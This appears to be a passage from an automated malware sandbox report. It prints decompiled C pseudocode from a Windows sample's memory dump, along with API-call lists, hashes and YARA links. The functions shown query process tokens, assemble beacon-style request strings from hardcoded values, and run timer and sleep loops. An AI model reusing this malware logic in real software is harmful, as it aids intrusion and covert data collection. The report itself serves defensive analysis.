				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E0118A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0118A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x01185a34
0x01185a35
0x01185a36
0x01185a37
0x01185a38
0x01185a3c
0x01185a43
0x01185a52
0x01185a55
0x01185a58
0x01185a5f
0x01185a62
0x01185a65
0x01185a68
0x01185a6b
0x01185a76
0x01185a78
0x01185a81
0x01185a89
0x01185a8b
0x01185a9d
0x01185aa7
0x01185aab
0x01185aba
0x01185abe
0x01185ac7
0x01185acf
0x01185acf
0x01185ad1
0x01185ad1
0x01185ad9
0x01185adf
0x01185ae3
0x01185ae3
0x01185aee

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01185A6E
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 01185A81
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01185A9D

Part of subcall function 0118A71F: RtlAllocateHeap.NTDLL(00000000,00000000,01185595), ref: 0118A72B

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 01185ABA
memcpy.NTDLL(00000000,00000000,0000001C), ref: 01185AC7
NtClose.NTDLL(?), ref: 01185AD9
NtClose.NTDLL(00000000), ref: 01185AE3

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: fce3328ae7dd09dc0897d887f5672ef617807864e5aecfce1239db60685eba75
Instruction ID: ff141fc05d2dc6bde27e959b0e8d8e026b1e9cd2b6d35a204a79b8866f573fcc
Opcode Fuzzy Hash: fce3328ae7dd09dc0897d887f5672ef617807864e5aecfce1239db60685eba75
Instruction Fuzzy Hash: C5211672900219BBDB11AF95DC85ADEBFBEEF08784F108022FA01E6110D7719A459FE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD1F0, Relevance: 9.5, APIs: 6, Instructions: 492COMMON

Download Yara Rule

APIs

std::locale::locale.LIBCPMTD ref: 6E1CD22B

Part of subcall function 6E1CE190: std::locale::_Init.LIBCPMT ref: 6E1CE197
Part of subcall function 6E1CE190: std::locale::facet::_Incref.LIBCPMTD ref: 6E1CE1A8

_setlocale.LIBCMT ref: 6E1CD251
SetConsoleOutputCP.KERNEL32(000004E3), ref: 6E1CD272
GetTempPathA.KERNEL32(00000550,6E2037E0), ref: 6E1CD2AF
SetConsoleCP.KERNEL32(00000000), ref: 6E1CD30C
GetWindowsDirectoryA.KERNEL32(6E298C60,00000550), ref: 6E1CD3EC

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Console$DirectoryIncrefInitOutputPathTempWindows_setlocalestd::locale::_std::locale::facet::_std::locale::locale
String ID:
API String ID: 3520124897-0
Opcode ID: 468db8fc8ad49e4b4dbe70df5ed3601b12b9436ebfa0dc25b475f3bd20d9e98a
Instruction ID: 4c2df5d4404c3fa1fe948e823e49738ea069e064c9d20e8c68642c6207f55174
Opcode Fuzzy Hash: 468db8fc8ad49e4b4dbe70df5ed3601b12b9436ebfa0dc25b475f3bd20d9e98a
Instruction Fuzzy Hash: 2D3228B2E00619CFDB08CFA8D588AADBBB3FB69704F10811ED505A7285D7746A85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA260, Relevance: 5.7, APIs: 1, Strings: 1, Instructions: 2181COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000550,?,6E202008,6E20200C,00000054,00000000,6E202008,6E20200C,00000054,00000000,6E202008,6E20200C,00000022,00000000,6E202008,6E20200C), ref: 6E1CBB39

Strings

^, xrefs: 6E1CBA5F

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: PathTemp
String ID: ^
API String ID: 2920410445-1590793086
Opcode ID: 02e4266ca75f20b7a93d612e54aaa863b7994a40018dfef94a1b8c9d4460663f
Instruction ID: 6e746a0985220d5da548d07382223b66a8a09577f7db703cf7d906aef81ff1ee
Opcode Fuzzy Hash: 02e4266ca75f20b7a93d612e54aaa863b7994a40018dfef94a1b8c9d4460663f
Instruction Fuzzy Hash: 31233BF2A00B20CFEB18CF68C598A6577B3B7AA704B05C21FD509972C6D6B45A84DF71

Uniqueness

Uniqueness Score: -1.00%

Function 01184AB6, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E01184AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x118d018; // 0xc25f505c
				asm("bswap eax");
				_t61 =  *0x118d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x118d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E0118D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x118d2a8; // 0x48aa5a8
				_t3 = _t64 + 0x118e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x118d02c,  *0x118d004, _t59);
				_t67 = E011856CD();
				_t68 =  *0x118d2a8; // 0x48aa5a8
				_t4 = _t68 + 0x118e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E011858DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x118d2a8; // 0x48aa5a8
					_t7 = _t126 + 0x118e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x118d238, 0, _v8);
				}
				_t73 = E0118A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x118d2a8; // 0x48aa5a8
					_t11 = _t121 + 0x118e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x118d238, 0, _v8);
				}
				_t146 =  *0x118d32c; // 0x5a395b0
				_t75 = E01184622(0x118d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x118d238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x118d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x118d238, _t152, _v20);
						goto L26;
					}
					E0118518F(GetTickCount());
					_t82 =  *0x118d32c; // 0x5a395b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x118d32c; // 0x5a395b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x118d32c; // 0x5a395b0
					_t148 = E01181BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						RtlFreeHeap( *0x118d238, _t152, _v8); // executed
						goto L25;
					}
					StrTrimA(_t148, 0x118c28c);
					_push(_t148);
					_t94 = E0118361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x118d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E01189070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E01186761();
						L22:
						HeapFree( *0x118d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E011869B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E0118391F(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E0118A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E01185800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0118A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x01184ab6
0x01184ab6
0x01184ab6
0x01184abf
0x01184ac8
0x01184aca
0x01184aca
0x01184ad7
0x01184ae2
0x01184ae5
0x01184aea
0x01184af3
0x01184af6
0x01184afb
0x01184afe
0x01184b03
0x01184b06
0x01184b12
0x01184b1f
0x01184b21
0x01184b27
0x01184b2c
0x01184b37
0x01184b39
0x01184b3c
0x01184b3e
0x01184b43
0x01184b49
0x01184b4e
0x01184b51
0x01184b56
0x01184b63
0x01184b65
0x01184b6b
0x01184b75
0x01184b75
0x01184b77
0x01184b7c
0x01184b81
0x01184b84
0x01184b89
0x01184b96
0x01184b98
0x01184ba6
0x01184ba6
0x01184ba8
0x01184bb6
0x01184bbb
0x01184bbd
0x01184bc2
0x01184d83
0x01184d8d
0x01184d96
0x01184bc8
0x01184bd4
0x01184bda
0x01184bdf
0x01184d77
0x01184d81
0x00000000
0x01184d81
0x01184beb
0x01184bf0
0x01184bf9
0x01184c0a
0x01184c0e
0x01184c17
0x01184c1d
0x01184c2c
0x01184c33
0x01184c3c
0x01184c42
0x01184d6b
0x01184d75
0x00000000
0x01184d75
0x01184c4e
0x01184c54
0x01184c55
0x01184c5a
0x01184c5f
0x01184d61
0x01184d69
0x00000000
0x01184d69
0x01184c68
0x01184c6f
0x01184c77
0x01184c7c
0x01184c85
0x01184c90
0x01184c95
0x01184c9a
0x01184d99
0x01184d4d
0x01184d4d
0x01184d52
0x01184d5d
0x01184d5f
0x00000000
0x01184d5f
0x01184ca4
0x01184ca9
0x01184cae
0x01184cb3
0x01184cc3
0x01184cc6
0x01184ccc
0x01184cd2
0x01184cd8
0x01184cdb
0x01184ce1
0x01184ce4
0x01184ce9
0x01184ced
0x01184ced
0x01184cf9
0x01184d05
0x01184d09
0x01184d0b
0x01184d10
0x01184d12
0x01184d17
0x01184d1c
0x01184d29
0x01184d31
0x01184d34
0x01184d34
0x01184d10
0x00000000
0x01184cfb
0x01184cff
0x01184d36
0x01184d39
0x01184d42
0x00000000
0x00000000
0x00000000
0x00000000
0x01184d42
0x01184d01
0x00000000
0x01184d01
0x01184cf9

APIs

GetTickCount.KERNEL32 ref: 01184ACA
wsprintfA.USER32 ref: 01184B1A
wsprintfA.USER32 ref: 01184B37
wsprintfA.USER32 ref: 01184B63
HeapFree.KERNEL32(00000000,?), ref: 01184B75
wsprintfA.USER32 ref: 01184B96
HeapFree.KERNEL32(00000000,?), ref: 01184BA6
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01184BD4
GetTickCount.KERNEL32 ref: 01184BE5
RtlEnterCriticalSection.NTDLL(05A39570), ref: 01184BF9
RtlLeaveCriticalSection.NTDLL(05A39570), ref: 01184C17

Part of subcall function 01181BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,011820C2,?,05A395B0), ref: 01181BE1
Part of subcall function 01181BB6: lstrlen.KERNEL32(?,?,?,011820C2,?,05A395B0), ref: 01181BE9
Part of subcall function 01181BB6: strcpy.NTDLL ref: 01181C00
Part of subcall function 01181BB6: lstrcat.KERNEL32(00000000,?), ref: 01181C0B
Part of subcall function 01181BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,011820C2,?,05A395B0), ref: 01181C28

StrTrimA.SHLWAPI(00000000,0118C28C,?,05A395B0), ref: 01184C4E

Part of subcall function 0118361A: lstrlen.KERNEL32(05A39A78,00000000,00000000,7742C740,011820ED,00000000), ref: 0118362A
Part of subcall function 0118361A: lstrlen.KERNEL32(?), ref: 01183632
Part of subcall function 0118361A: lstrcpy.KERNEL32(00000000,05A39A78), ref: 01183646
Part of subcall function 0118361A: lstrcat.KERNEL32(00000000,?), ref: 01183651

lstrcpy.KERNEL32(00000000,?), ref: 01184C6F
lstrcpy.KERNEL32(?,?), ref: 01184C77
lstrcat.KERNEL32(?,?), ref: 01184C85
lstrcat.KERNEL32(?,00000000), ref: 01184C8B

Part of subcall function 01189070: lstrlen.KERNEL32(?,00000000,05A39A98,00000000,01188808,05A39C76,?,?,?,?,?,63699BC3,00000005,0118D00C), ref: 01189077
Part of subcall function 01189070: mbstowcs.NTDLL ref: 011890A0
Part of subcall function 01189070: memset.NTDLL ref: 011890B2

wcstombs.NTDLL ref: 01184D1C

Part of subcall function 0118391F: SysAllocString.OLEAUT32(?), ref: 0118395A

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

HeapFree.KERNEL32(00000000,?,?), ref: 01184D5D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01184D69
RtlFreeHeap.NTDLL(00000000,?,?,05A395B0), ref: 01184D75
HeapFree.KERNEL32(00000000,?), ref: 01184D81
RtlFreeHeap.NTDLL(00000000,?), ref: 01184D8D

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3748877296-0
Opcode ID: 72681b1548d615ad4e417d6a6b7896f7a8a4cd3ebde390c1a630050da863896d
Instruction ID: 700a69911ace46a606247042518cb8c028016dcc49fbb49a5f92123a50df742b
Opcode Fuzzy Hash: 72681b1548d615ad4e417d6a6b7896f7a8a4cd3ebde390c1a630050da863896d
Instruction Fuzzy Hash: BC915B71900209AFDF29EFA8EC48A9E7BB9EF48354F148025F514D7260DB31D991DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 011851B0, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E011851B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x118d240);
					_v20 = 0;
					_v16 = 0;
					L0118AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x118d26c; // 0x2d8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x118d24c = 5;
						} else {
							_t68 = E01188D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x118d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0118A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E011836B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x118d244);
							goto L21;
						} else {
							__eflags =  *0x118d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E01186761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x118d248);
								L21:
								L0118AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x118d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x011851b0
0x011851c2
0x011851c5
0x011851d1
0x011851d7
0x011851dc
0x01185343
0x011851e2
0x011851e2
0x011851e4
0x011851e9
0x011851ea
0x011851f0
0x011851f3
0x011851f6
0x01185204
0x0118520f
0x01185212
0x01185214
0x01185221
0x0118522b
0x0118522d
0x01185232
0x01185237
0x01185242
0x01185242
0x01185239
0x01185239
0x01185240
0x00000000
0x00000000
0x01185240
0x0118524c
0x00000000
0x0118524f
0x01185253
0x0118525e
0x0118525e
0x01185265
0x0118526e
0x01185275
0x0118527e
0x01185281
0x01185284
0x01185289
0x0118528e
0x00000000
0x00000000
0x01185290
0x01185293
0x01185296
0x01185299
0x00000000
0x0118529b
0x011852aa
0x011852aa
0x00000000
0x011852d8
0x011852d8
0x011852dd
0x011852fc
0x011852fe
0x01185303
0x01185304
0x00000000
0x011852df
0x011852df
0x011852e5
0x00000000
0x011852e7
0x011852e7
0x011852ec
0x011852ee
0x011852f3
0x011852f4
0x0118530a
0x0118530a
0x01185312
0x0118531d
0x01185320
0x0118532b
0x0118532d
0x01185330
0x01185332
0x00000000
0x01185338
0x00000000
0x01185338
0x01185332
0x011852e5
0x00000000
0x011852dd
0x011852ad
0x011852af
0x011852b2
0x011852b3
0x011852b3
0x011852b7
0x011852c1
0x011852c1
0x011852c7
0x011852ca
0x011852ca
0x011852d0
0x011852d0
0x0118534d
0x00000000

APIs

memset.NTDLL ref: 011851C5
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 011851D1
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 011851F6
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01185212
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0118522B
HeapFree.KERNEL32(00000000,00000000), ref: 011852C1
CloseHandle.KERNEL32(?), ref: 011852D0
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0118530A
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,01185D5E,?), ref: 01185320
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0118532B

Part of subcall function 01188D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05A39368,00000000,?,74B5F710,00000000,74B5F730), ref: 01188D63
Part of subcall function 01188D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05A393A0,?,00000000,30314549,00000014,004F0053,05A3935C), ref: 01188E00
Part of subcall function 01188D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0118523E), ref: 01188E12

GetLastError.KERNEL32 ref: 0118533D

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 031ad33dfe6d70a8fda58c6b675ca6525c43460868f04ea004ccc95520afa424
Instruction ID: b723cd5511e727783e52e0b7b50ddefd395c4bbe3809cbe27360435ecda6313f
Opcode Fuzzy Hash: 031ad33dfe6d70a8fda58c6b675ca6525c43460868f04ea004ccc95520afa424
Instruction Fuzzy Hash: 52515371801228EBDF29AFD4DC84DEEBFBAEF45760F208225F410A2184D7708640CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0118232F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0118232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0118AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x118d2a8; // 0x48aa5a8
				_t5 = _t13 + 0x118e87e; // 0x5a38e26
				_t6 = _t13 + 0x118e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0118ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x118d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x0118232f
0x01182337
0x0118233b
0x01182341
0x01182346
0x0118234b
0x0118234e
0x01182351
0x01182356
0x01182357
0x0118235a
0x0118235f
0x01182366
0x01182370
0x01182372
0x01182373
0x01182376
0x01182392
0x01182398
0x0118239c
0x011823ea
0x0118239e
0x011823ab
0x011823bb
0x011823c3
0x011823d5
0x011823d9
0x00000000
0x00000000
0x011823c5
0x011823c8
0x011823cd
0x011823cf
0x011823cf
0x011823ad
0x011823af
0x011823db
0x011823dc
0x011823dc
0x011823ab
0x011823f1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,01185C31,?,?,4D283A53,?,?), ref: 0118233B
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 01182351
_snwprintf.NTDLL ref: 01182376
CreateFileMappingW.KERNELBASE(000000FF,0118D2AC,00000004,00000000,00001000,?), ref: 01182392
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01185C31,?,?,4D283A53), ref: 011823A4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 011823BB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,01185C31,?,?), ref: 011823DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01185C31,?,?,4D283A53), ref: 011823E4

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 68e14bd95be8f693731b48ca30cd87b4d2cdbf31aa1d4809c85862452f451ed7
Instruction ID: 9fba45dd438cec172f86c939364dde760bb29d87f1ecf65886f5abd5580391bd
Opcode Fuzzy Hash: 68e14bd95be8f693731b48ca30cd87b4d2cdbf31aa1d4809c85862452f451ed7
Instruction Fuzzy Hash: DC21E77A644204BBD72ABF68EC45FCE3BA9AB49750F218121FA15E71C0D7709549CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 011812E5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E011812E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x118d238 = _t10;
				if(_t10 != 0) {
					 *0x118d1a8 = GetTickCount();
					_t12 = E01183E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L0118B08A();
							_t33 = _t14 + _t16;
							_t18 = E01185548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E01184DA2(_t25) != 0) {
							 *0x118d260 = 1; // executed
						}
						_t12 = E01185BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x011812e5
0x011812eb
0x011812ec
0x011812f8
0x011812fe
0x01181305
0x01181315
0x0118131a
0x01181321
0x01181323
0x01181328
0x0118132e
0x01181334
0x0118133e
0x01181342
0x01181344
0x01181349
0x0118134a
0x0118134b
0x01181350
